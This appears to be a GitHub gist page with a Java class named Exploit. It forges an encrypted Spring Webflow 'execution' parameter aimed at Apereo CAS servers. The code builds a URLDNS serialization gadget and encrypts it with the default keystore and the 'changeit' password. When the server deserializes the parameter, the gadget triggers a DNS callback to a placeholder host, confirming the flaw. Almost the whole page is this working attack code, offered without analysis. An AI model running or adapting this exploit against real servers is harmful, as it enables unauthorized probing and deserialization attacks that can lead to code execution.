-
-
Save devme4f/177fcc11685a50b72aed0a1efd4d0fbe to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.cryptacular.bean.*; | |
| import org.cryptacular.generator.sp80038a.RBGNonce; | |
| import org.cryptacular.io.URLResource; | |
| import org.cryptacular.spec.BufferedBlockCipherSpec; | |
| import org.jasig.spring.webflow.plugin.Transcoder; | |
| import java.io.*; | |
| import java.net.*; | |
| import java.lang.reflect.Field; | |
| import java.security.KeyStore; | |
| import java.util.*; | |
| import java.util.zip.GZIPInputStream; | |
| import java.util.zip.GZIPOutputStream; | |
| public class Exploit { | |
| private static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { | |
| Field field = obj.getClass().getDeclaredField(fieldName); | |
| field.setAccessible(true); | |
| field.set(obj, value); | |
| } | |
| static class SilentURLStreamHandler extends URLStreamHandler { | |
| protected URLConnection openConnection(URL u) throws IOException { | |
| return null; | |
| } | |
| protected synchronized InetAddress getHostAddress(URL u) { | |
| return null; | |
| } | |
| } | |
| public static Object getObject(final String url) throws Exception { | |
| URLStreamHandler handler = new SilentURLStreamHandler(); | |
| HashMap ht = new HashMap(); | |
| URL u = new URL(null, url, handler); | |
| ht.put(u, url); | |
| setFieldValue(u, "hashCode", -1); | |
| return ht; | |
| } | |
| public static void main(String[] args) throws Exception { | |
| String url = "http://hi.<DNS_SERVER>"; | |
| UUID uuid = UUID.randomUUID(); | |
| byte[] bytes = new EncryptedTranscoder().encode(getObject(url)); | |
| String base64 = Base64.getEncoder().encodeToString(bytes); | |
| String out = "execution=" + uuid + "_" + URLEncoder.encode(base64); | |
| System.out.println(out); | |
| } | |
| public static class EncryptedTranscoder implements Transcoder { | |
| private CipherBean cipherBean; | |
| private boolean compression = true; | |
| public EncryptedTranscoder() throws IOException { | |
| BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean(); | |
| bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7")); | |
| bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore()); | |
| bufferedBlockCipherBean.setKeyAlias("aes128"); | |
| bufferedBlockCipherBean.setKeyPassword("changeit"); | |
| bufferedBlockCipherBean.setNonce(new RBGNonce()); | |
| this.setCipherBean(bufferedBlockCipherBean); | |
| } | |
| public EncryptedTranscoder(CipherBean cipherBean) throws IOException { | |
| this.setCipherBean(cipherBean); | |
| } | |
| public void setCompression(boolean compression) { | |
| this.compression = compression; | |
| } | |
| protected void setCipherBean(CipherBean cipherBean) { | |
| this.cipherBean = cipherBean; | |
| } | |
| public byte[] encode(Object o) throws IOException { | |
| if (o == null) { | |
| return new byte[0]; | |
| } else { | |
| ByteArrayOutputStream outBuffer = new ByteArrayOutputStream(); | |
| ObjectOutputStream out = null; | |
| try { | |
| if (this.compression) { | |
| out = new ObjectOutputStream(new GZIPOutputStream(outBuffer)); | |
| } else { | |
| out = new ObjectOutputStream(outBuffer); | |
| } | |
| out.writeObject(o); | |
| } finally { | |
| if (out != null) { | |
| out.close(); | |
| } | |
| } | |
| try { | |
| return this.cipherBean.encrypt(outBuffer.toByteArray()); | |
| } catch (Exception var7) { | |
| throw new IOException("Encryption error", var7); | |
| } | |
| } | |
| } | |
| public Object decode(byte[] encoded) throws IOException { | |
| byte[] data; | |
| try { | |
| data = this.cipherBean.decrypt(encoded); | |
| } catch (Exception var11) { | |
| throw new IOException("Decryption error", var11); | |
| } | |
| ByteArrayInputStream inBuffer = new ByteArrayInputStream(data); | |
| ObjectInputStream in = null; | |
| Object var5; | |
| try { | |
| if (this.compression) { | |
| in = new ObjectInputStream(new GZIPInputStream(inBuffer)); | |
| } else { | |
| in = new ObjectInputStream(inBuffer); | |
| } | |
| var5 = in.readObject(); | |
| } catch (ClassNotFoundException var10) { | |
| throw new IOException("Deserialization error", var10); | |
| } finally { | |
| if (in != null) { | |
| in.close(); | |
| } | |
| } | |
| return var5; | |
| } | |
| protected KeyStore createAndPrepareKeyStore() { | |
| KeyStoreFactoryBean ksFactory = new KeyStoreFactoryBean(); | |
| URL u = this.getClass().getResource("/etc/keystore.jceks"); | |
| ksFactory.setResource(new URLResource(u)); | |
| ksFactory.setType("JCEKS"); | |
| ksFactory.setPassword("changeit"); | |
| return ksFactory.newInstance(); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment